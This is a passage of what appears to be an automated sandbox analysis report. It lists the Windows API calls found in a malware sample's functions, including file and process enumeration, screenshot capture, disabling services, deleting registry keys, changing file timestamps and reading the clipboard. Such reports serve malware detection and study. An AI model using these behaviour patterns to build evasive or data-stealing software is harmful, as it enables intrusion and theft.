                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00407DE3
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Findwsprintf$File$CloseCountFirstNextSleepTicklstrcpylstrlen
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\%s\%s$%s\*$.
                                                                                                                                                                                                                                                      • API String ID: 2951824930-2482664969
                                                                                                                                                                                                                                                      • Opcode ID: b551fab8e6f85b9cfb29b3b61362c386f610e7aae9eb25f7f85e37cc7dde5924
                                                                                                                                                                                                                                                      • Instruction ID: 31ed09feffa5d5b1f6df6013f9e8ad588a4fcfb57bb3d66a0b86f58f988e3b84
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b551fab8e6f85b9cfb29b3b61362c386f610e7aae9eb25f7f85e37cc7dde5924
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 80214271D0422DABCF219BA1DC49FEE7B7CEF04754F5400A2FD08E2190E678AB558B96
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005), ref: 00410F57
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410F75
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00410F88
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00410FC3
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: lstrcpyA.KERNEL32(00000000,?), ref: 00410CB8
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: lstrcatA.KERNEL32(00000000,0042A3B0), ref: 00410CC6
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: lstrlenA.KERNEL32(?), ref: 00410CDD
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: lstrlenA.KERNEL32(00000001), ref: 00410D14
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: lstrcatA.KERNEL32(00000000,00000000), ref: 00410D26
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: lstrlenA.KERNEL32(00000000), ref: 00410D33
                                                                                                                                                                                                                                                        • Part of subcall function 00410C84: GetTickCount.KERNEL32 ref: 00410D56
                                                                                                                                                                                                                                                        • Part of subcall function 00410F49: FindClose.KERNEL32(00000000), ref: 00410FF0
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 00410FFA
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00411005
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$lstrlen$CloseFilelstrcatwsprintf$CountFirstNextSleepTicklstrcpy
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.
                                                                                                                                                                                                                                                      • API String ID: 1166720965-2663966076
                                                                                                                                                                                                                                                      • Opcode ID: 7feecf4d70b6509db16cebd3952902a63602dfc2898b091a80137c7e6d057285
                                                                                                                                                                                                                                                      • Instruction ID: 6dbc7208595d96f97861377e4023f668a4a5fd743d8a18087754becb22f2692f
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7feecf4d70b6509db16cebd3952902a63602dfc2898b091a80137c7e6d057285
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AC11873290021C6BDF319B61DC49FEE777CEB04718F040496FD08D2151E6B89AD68F65
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: EnterCriticalSection.KERNEL32(0044F7E0), ref: 00405B51
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetDesktopWindow.USER32 ref: 00405B68
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: GetWindowRect.USER32(00000000), ref: 00405B6F
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BCA
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: SHDeleteKeyA.SHLWAPI(80000002,00000000), ref: 00405BEB
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCreateKeyExA.ADVAPI32(80000002,00000000,00000000,?,00000000), ref: 00405C17
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegDeleteValueA.ADVAPI32(?,00000000), ref: 00405C37
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: RegCloseKey.ADVAPI32(?), ref: 00405C40
                                                                                                                                                                                                                                                        • Part of subcall function 00405B34: lstrlenA.KERNEL32(?), ref: 00405C70
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040607B
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000BB8,00000001), ref: 0040608C
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040609A
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00001388), ref: 004060AE
                                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004060B4
                                                                                                                                                                                                                                                      • Process32First.KERNEL32 ref: 004060CF
                                                                                                                                                                                                                                                      • EnumWindows.USER32(Function_00005FD0,00000128), ref: 00406102
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000002), ref: 0040610D
                                                                                                                                                                                                                                                      • Process32Next.KERNEL32(00000000,?), ref: 00406119
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406124
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00406130
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CloseDeleteSleep$CountCreateHandleProcess32TickWindow$CriticalDesktopEnterEnumFirstNextRectSectionSnapshotToolhelp32ValueWindowslstrlen
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 409001591-0
                                                                                                                                                                                                                                                      • Opcode ID: cc7cc4d475e675ff0496617ce75b784f747ab016b1c6e83c6581fde991853430
                                                                                                                                                                                                                                                      • Instruction ID: 6d14e935c9f0d40d690cf77a63c9d9c3f0f734b2a94bd45cc227ede2a9c64a07
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc7cc4d475e675ff0496617ce75b784f747ab016b1c6e83c6581fde991853430
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D22105712443009FE720EB709C49B6B77ACEB40315F01093BF956A12C1DB7CD829C66A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • Sleep.KERNEL32(00000005,?,76AE8A60,00000000), ref: 00407864
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00407883
                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(?,?), ref: 00407896
                                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 004078D4
                                                                                                                                                                                                                                                      • FindNextFileA.KERNEL32(00000000,00000010), ref: 0040798E
                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 004079BA
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Find$Filewsprintf$CloseFirstNextSleep
                                                                                                                                                                                                                                                      • String ID: %s\%s$%s\*$.exe
                                                                                                                                                                                                                                                      • API String ID: 1758027058-2151574129
                                                                                                                                                                                                                                                      • Opcode ID: 5f073de3dcff7f9fe1fd304a7e1876fc0275856f7beec281107b431e190248e2
                                                                                                                                                                                                                                                      • Instruction ID: 163c00c7d8bbd4ad810b400cbd44254186020fd6e3715fb87303bc0dc3067a1c
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5f073de3dcff7f9fe1fd304a7e1876fc0275856f7beec281107b431e190248e2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8141D772E082285BEF30A7A09D48BDE77AC9F45315F1400B7ED44F2191D77CAA84CB5A
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,0040D4C0,76AF0F00,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D5A
                                                                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D61
                                                                                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 00413D74
                                                                                                                                                                                                                                                      • OpenThreadToken.ADVAPI32(00000000,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413D7B
                                                                                                                                                                                                                                                      • LookupPrivilegeValueA.ADVAPI32(00000000,00000001,=A), ref: 00413D99
                                                                                                                                                                                                                                                      • AdjustTokenPrivileges.ADVAPI32(0040D4C0,00000000,?,00000000,00000000,00000000), ref: 00413DC2
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(0040D4C0,?,00413DE4,SeShutdownPrivilege,00000001,0040D4C0), ref: 00413DCD
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Token$CurrentOpenProcessThread$AdjustCloseHandleLookupPrivilegePrivilegesValue
                                                                                                                                                                                                                                                      • String ID: =A
                                                                                                                                                                                                                                                      • API String ID: 2466252811-2399317284
                                                                                                                                                                                                                                                      • Opcode ID: 4fe2538e3e2ea93d9b9fbef1b55b33063fb91e0da2af47dccb38c6a48e1a1dd9
                                                                                                                                                                                                                                                      • Instruction ID: 475d8baa3e36ee8e1e9a3101c06148507bb2b604236046abb380cd1cc11b1ce2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4fe2538e3e2ea93d9b9fbef1b55b33063fb91e0da2af47dccb38c6a48e1a1dd9
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF112A71A01218FFDB109FA09D09DEF7ABCEF04742F504066F901E2150DA349F459BA9
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,00000000), ref: 00411375
                                                                                                                                                                                                                                                      • GetWindowDC.USER32(?), ref: 004113B0
                                                                                                                                                                                                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 004113BC
                                                                                                                                                                                                                                                      • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 004113C8
                                                                                                                                                                                                                                                      • SelectObject.GDI32(?,00000000), ref: 004113D5
                                                                                                                                                                                                                                                      • BitBlt.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00CC0020), ref: 004113EC
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: GetProcessHeap.KERNEL32(00000008,00413E9A,TokenIntegrityLevel,76AEE010,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052), ref: 00410C05
                                                                                                                                                                                                                                                        • Part of subcall function 00410BF4: RtlAllocateHeap.NTDLL(00000000,?,76AE83C0,00413E9A,00000000,76AE83C0,?,?,?,?,?,76AF0440,0040C052,C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\,00000000), ref: 00410C20
                                                                                                                                                                                                                                                      • DeleteDC.GDI32(?), ref: 00411518
                                                                                                                                                                                                                                                      • ReleaseDC.USER32(?,?), ref: 00411524
                                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0041152D
                                                                                                                                                                                                                                                        • Part of subcall function 004112DD: GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041133D
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: CompatibleCreateDeleteHeapObjectWindow$AllocateBitmapBitsProcessRectReleaseSelect
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 516154677-0
                                                                                                                                                                                                                                                      • Opcode ID: 42662666fbb734c4210314259c882b64821a0792b7043985fef9a84e3e4a9c2e
                                                                                                                                                                                                                                                      • Instruction ID: 58c23c49903a31b3a89182b6c7fdb0ade33333abb29496c8dbe0a914effc51ca
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 42662666fbb734c4210314259c882b64821a0792b7043985fef9a84e3e4a9c2e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D61AF71E00219EFDF01DFA8C844AFEBBB5FF44315F0440AAE901A6261D7399996CF69
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,ServicesActive,000F003F,00000000,00000000,00405B21,00000000,00000001,?,00405BAD), ref: 00413A2B
                                                                                                                                                                                                                                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF,?,?,00405BAD), ref: 00413A45
                                                                                                                                                                                                                                                      • ControlService.ADVAPI32(00000000,00000001,?,?,00405BAD), ref: 00413A5B
                                                                                                                                                                                                                                                      • ChangeServiceConfigA.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00405BAD), ref: 00413A7B
                                                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00405BAD), ref: 00413A82
                                                                                                                                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000,?,00405BAD), ref: 00413A89
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Service$CloseHandleOpen$ChangeConfigControlManager
                                                                                                                                                                                                                                                      • String ID: ServicesActive
                                                                                                                                                                                                                                                      • API String ID: 1149404821-3071072050
                                                                                                                                                                                                                                                      • Opcode ID: e339f78d4b0a7e80bd98c81ccaf5d6764f04251041539ca3299aa54bce896337
                                                                                                                                                                                                                                                      • Instruction ID: f0dc7679a38273aa7a14fa9322e6c16f7626b2359b715fcf80eadf06e85900ad
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e339f78d4b0a7e80bd98c81ccaf5d6764f04251041539ca3299aa54bce896337
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FC0168752443947BCB115BB44C88EFF3F2C9F06393F0001A8F650B3281CE6946468339
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00413AB3
                                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00413AC4
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413AFD
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413B40
                                                                                                                                                                                                                                                      • SystemTimeToFileTime.KERNEL32(000007D9,?), ref: 00413B8E
                                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000003,00000080,00000000), ref: 00413BA5
                                                                                                                                                                                                                                                      • SetFileTime.KERNEL32(00000000,?,?,?), ref: 00413BBF
                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00413BC6
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.000000000044E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000458000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000463000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849251119.0000000000465000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_400000_takyouhoymc.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Time$File$System$CloseCountCreateHandleTick
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1788265925-0
                                                                                                                                                                                                                                                      • Opcode ID: 62f3a8fd01e86ba9802440c37d62e379551f9e638d6293a371f93cda34054580
                                                                                                                                                                                                                                                      • Instruction ID: 6c0202463d9a12d9f3580f39e1f5b74af0f3cd93389b840999671226064c08cf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 62f3a8fd01e86ba9802440c37d62e379551f9e638d6293a371f93cda34054580
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C031B877A90318F2CB14B795AC43BDDB77DAF19324F41002BF601B50A0EBB496468B6D
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • IsClipboardFormatAvailable.USER32(00000001), ref: 004139A3
                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 004139AF
                                                                                                                                                                                                                                                      • GetClipboardData.USER32(00000001), ref: 004139BB
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 004139C7
                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 004139D2
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 004139DD
                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00413A00
                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 00413A06
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000002.00000002.207849004523.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207848960982.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849081345.000000000042A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849121035.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849173551.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000002.00000002.207849211320.0000000000449000.00000008.00000001.01000000.00000006.sdmpDownload File
